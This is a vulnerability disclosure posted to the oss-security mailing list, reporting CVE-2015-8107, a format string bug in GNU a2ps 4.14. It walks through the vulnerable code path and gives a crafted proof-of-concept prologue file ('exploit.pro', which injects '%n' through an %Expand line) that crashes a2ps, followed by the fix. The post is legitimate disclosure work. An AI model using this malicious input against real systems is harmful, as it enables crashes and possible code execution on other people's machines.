|
Message-ID: <5649AED2.3060009@ropas.snu.ac.kr> Date: Mon, 16 Nov 2015 19:24:18 +0900 From: 김종권 <jgkim@...as.snu.ac.kr> To: oss-security@...ts.openwall.com Cc: wslee@...as.snu.ac.kr Subject: CVE-2015-8107 - a2ps(gnu) v4.14 format string vulnerability Dear List, I am writing this to report a format string vulnerability in a2ps. (4.14, which is the latest version) Also I already have been assigned a CVE identifier from MITRE "CVE-2015-8107", so I want to make public this vulnerability. - Target Platform Linux - Target Version 4.14 (Latest Version) - Vulnerability description When user runs a2ps with malicious crafted pro(a2ps prologue) file, an attacker can execute arbitrary code. The function output_file processes the %Expand command in pro file. The variable `expansion' in the function output_file may hold a malicious input string, which can be used as a format argument of vsprintf. -- Step 1. (ouput.c 524 line) 524 expansion = ((char *) expand_user_string (job, FIRST_FILE (job), (const uchar *) "Expand: requirement", (const uchar *) token)); For instance, the variable expansion will point to the string “%n” when a text line "%Expand: %%\n” exists in an input pro file. -- Step 2. (output.c 525 line) 525 output (dest, expansion); output() is called in line 525, and the argument `expansion' is used as a format string, which can be malicious, as we described in step 1. -- Step 3. (output.c 873 line) 182 void output (struct output * out, const char *format, ...){ ... 202 ds_unsafe_cat_vsprintf (out->chunk,format, args); ... The variable format, which can be malicious, can be passed to ds_unsafe_cat_vsprintf() in line 202. -- step 4. (dstring.c 321 line) 321 void ds_unsafe_cat_vsprintf (struct dstring * ds, const char *format, va_list args){ ... 326 vsprintf (ds->content + ds->len, format, args); ... The value of format, which can be malicious, is used as an argument of vsprintf in line 326, therefore arbitrary code can be executed. -- Step 4. Our malicious input "exploit.pro" =================================== % -*-postscript-*- % PostScript Prologue % % $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $ % % % This file is part of a2ps. % % This program is free software; you can redistribute it and/or modify % it under the terms of the GNU General Public License as published by % the Free Software Foundation; either version 3, or (at your option) % any later version. % % This program is distributed in the hope that it will be useful, % but WITHOUT ANY WARRANTY; without even the implied warranty of % MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the % GNU General Public License for more details. % % You should have received a copy of the GNU General Public License % along with this program; see the file COPYING. If not, write to % the Free Software Foundation, 59 Temple Place - Suite 330, % Boston, MA 02111-1307, USA. % Documentation The layout is the same as samp(bw)samp, but alternating gray and white lines. There are two macros defining the behavior: samp(pro.matrix.cycle)samp defines the length of the cycle (number of white and gray lines). It defaults to 6. samp(pro.matrix.gray)samp defines the number of gray lines. Default is 3. EndDocumentation % -- code follows this line -- %%IncludeResource: file base.ps %%IncludeResource: file a2ps.hdr %%BeginResource: procset a2ps-matrix-Prolog 2.0 1 % Function T(ab), jumps to the n-th tabulation in the current line /T { cw mul x0 add y0 moveto } bind def % Function n: move to the next line /n { %def /y0 y0 bfs sub store % Draw a grey background /nline nline 1 add def % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ % @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@ %Expand: %%n % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ %Expand: nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge { gsave newpath x v get y0 currentfont /Descent get currentfontsize mul add moveto pw 0 rlineto 0 bfs rlineto pw neg 0 rlineto closepath 0.9 setgray fill grestore } if x0 y0 moveto } bind def % Function N: show and move to the next line /N { Show n } bind def /S { Show } bind def /p { false UL false BX %Face: Plain Courier bfs Show } bind def /sy { false UL false BX %Face: Symbol Symbol bfs Show } bind def /k { false UL false BX %Face: Keyword Courier-Oblique bfs Show } bind def /K { false UL false BX %Face: Keyword_strong Courier-Bold bfs Show } bind def /c { false UL false BX %Face: Comment Courier-Oblique bfs Show } bind def /C { false UL false BX %Face: Comment_strong Courier-BoldOblique bfs Show } bind def /l { false UL false BX %Face: Label Helvetica bfs Show } bind def /L { false UL false BX %Face: Label_strong Helvetica-Bold bfs Show } bind def /str{ false UL false BX %Face: String Times-Roman bfs Show } bind def /e{ false UL true BX %Face: Error Helvetica-Bold bfs Show } bind def %%EndResource %%BeginSetup % The font for line numbering /f# /Helvetica findfont bfs .6 mul scalefont def /nline 0 def %%EndSetup =================================== Execute =================================== ~ $ a2ps --version GNU a2ps 4.14 Written by Akim Demaille, Miguel Santana. Copyright (c) 1988-1993 Miguel Santana Copyright (c) 1995-2000 Akim Demaille, Miguel Santana Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ~ $ a2ps --prologue=exploit test.tex -o test.ps aborted (core dumped) =================================== - How to fix (output.c 525 line) 525 output (dest, expansion); ===> output (dest, "%s", expansion); - How we found the vulnerability We used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm in a2ps dstring.c 326 line, So we looked for a a2ps source code and found the bug. Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed by Abstract Interpretation and the analysis is sound in design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience. References [1]: http://ropas.snu.ac.kr/sparrow/ [2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14. [3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12 Sincerely, Woosuk Lee & Jong-Gwon Kim ----------------------------- Woosuk Lee Ph.D. candidate ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) wslee@...as.snu.ac.kr ----------------------------- ----------------------------- Jong-Gwon Kim Graduate student ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) jgkim@...as.snu.ac.kr -----------------------------
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.